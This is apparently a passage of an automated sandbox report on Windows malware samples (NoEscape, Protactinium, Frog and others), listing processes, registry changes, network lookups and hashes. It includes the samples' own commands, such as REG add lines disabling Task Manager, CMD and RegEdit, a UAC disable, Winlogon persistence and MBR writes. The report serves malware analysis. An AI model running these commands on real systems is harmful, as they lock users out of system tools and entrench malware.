C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x15c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4004 -ip 4004
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 1060
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/4004-0-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4004-1-0x0000000000400000-0x000000000040E000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win7-20240221-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 556 wrote to memory of 3976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 556 wrote to memory of 3976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 556 wrote to memory of 3976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3976 -ip 3976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.98.74.40.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
Files
memory/4476-0-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-1-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-2-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-3-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-4-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-5-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-6-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-7-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-8-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-9-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-10-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-11-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-12-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-13-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-14-0x0000000000160000-0x0000000000192000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
151s
Max time network
156s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
141s
Max time network
123s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\REG.exe | N/A |
Disables Task Manager via registry modification
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\REG.exe
REG add HKCU\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 564
Network
Files
memory/1836-0-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1836-1-0x0000000000400000-0x000000000040E000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
141s
Max time network
114s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/3720-0-0x0000000000990000-0x0000000000991000-memory.dmp
memory/3720-3-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-4-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-5-0x0000000000990000-0x0000000000991000-memory.dmp
memory/3720-6-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-7-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-8-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-9-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-10-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-11-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-12-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-13-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-14-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-15-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-16-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-17-0x0000000000400000-0x000000000064F000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:16
Platform
win10v2004-20240226-en
Max time kernel
14s
Max time network
36s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\winnt32.exe" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\noescape.png" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnt32.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| File opened for modification | C:\Windows\winnt32.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Mouse | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Mouse\SwapMouseButtons = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop\AutoColorization = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "117" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39b4055 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
memory/2628-0-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/2628-1-0x0000000000400000-0x00000000005CC000-memory.dmp
C:\Users\Public\Desktop\శՂⴣᏲᘨ⻔ᐦᕲ➵Ჩᚴ༙༼ㄝ▽
| MD5 | e49f0a8effa6380b4518a8064f6d240b |
| SHA1 | ba62ffe370e186b7f980922067ac68613521bd51 |
| SHA256 | 8dbd06e9585c5a16181256c9951dbc65621df66ceb22c8e3d2304477178bee13 |
| SHA512 | de6281a43a97702dd749a1b24f4c65bed49a2e2963cabeeb2a309031ab601f5ec488f48059c03ec3001363d085e8d2f0f046501edf19fafe7508d27e596117d4 |
memory/2628-177-0x0000000000400000-0x00000000005CC000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe"
Network
Files
memory/2212-1-0x0000000000400000-0x0000000000584000-memory.dmp
memory/2212-0-0x0000000000400000-0x0000000000584000-memory.dmp
memory/2212-2-0x0000000000400000-0x0000000000584000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win10v2004-20240226-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5036 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 5036 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 5036 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe"
C:\Users\Admin\AppData\Roaming\1337\Frog.exe
"C:\Users\Admin\AppData\Roaming\1337\Frog.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsx590F.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
C:\Users\Admin\AppData\Roaming\1337\Frog.exe
| MD5 | 41e75c80873b0ca18d56ddaba4c5aadd |
| SHA1 | 1d0423d6e66a4739db22939e1c16bcdc7eaa9746 |
| SHA256 | b7d4eef3fa0244a3618b3d60eab9a3ebaf1f8ec5cce9598d37e99b9d7a988cec |
| SHA512 | 402de19c72015fefefe02347fad8907762c991538c4ef7aa6b646c90d6fd7aadadcdb8be9f03d78a1b7cec712516faa318fde738b52dfa7b3aaa34219f2d1530 |
memory/3952-19-0x00000000008A0000-0x00000000008A1000-memory.dmp
C:\Users\Admin\AppData\Roaming\1337\php5ts.dll
| MD5 | c9aff68f6673fae7580527e8c76805b6 |
| SHA1 | bb62cc1db82cfe07a8c08a36446569dfc9c76d10 |
| SHA256 | 9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4 |
| SHA512 | c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56 |
memory/3952-24-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-25-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-26-0x00000000008A0000-0x00000000008A1000-memory.dmp
memory/3952-27-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-28-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-29-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-30-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-31-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-32-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-33-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-34-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-35-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-36-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-37-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-38-0x0000000000400000-0x000000000064F000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
